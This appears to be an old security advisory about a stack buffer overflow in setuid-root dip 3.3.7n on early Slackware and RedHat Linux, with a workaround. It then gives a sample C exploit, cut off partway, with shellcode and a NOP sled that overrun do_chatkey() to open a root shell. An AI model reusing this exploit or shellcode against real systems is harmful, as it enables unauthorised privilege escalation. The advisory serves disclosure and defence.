PROGRAM: dip 3.3.7n, and probably other variants AFFECTED SYSTEMS: Linux - Slackware 3.0 and RedHat 2.1 verified, others unknown. IMPACT: Local users can get superuser privleges. SYNOPSIS: Some Linux distributions come with dip setuid root by default. There are multiple points in dip where an unbounded buffer is used with user supplied data making possible a stack overflow. Functions in which this appears to be possible include do_chatkey() and mdm_dial(). WORKAROUND: It is suggested that at least until the source has been further scrutinized that dip not be setuid unless necessary. chmod 0755 dip If you must have dip setuid, place it in a group where it can only be executed by trusted users. SAMPLE EXPLOIT: /* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */ #include #include #include #include #include #define PATH_DIP "/usr/sbin/dip" u_char shell[] = /* courtesy of avalon ;) */ "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; u_long esp() { __asm__("movl %esp, %eax"); } main() { u_char buf[1024]; u_long addr; int i, f; strcpy(buf, "chatkey "); addr = esp() - 192; for (i=8; i<128+16; i+=4) *((u_long *) (buf+i)) = addr; for (i=128+16; i<512; i++) buf[i] = 0x90; for (i=0; i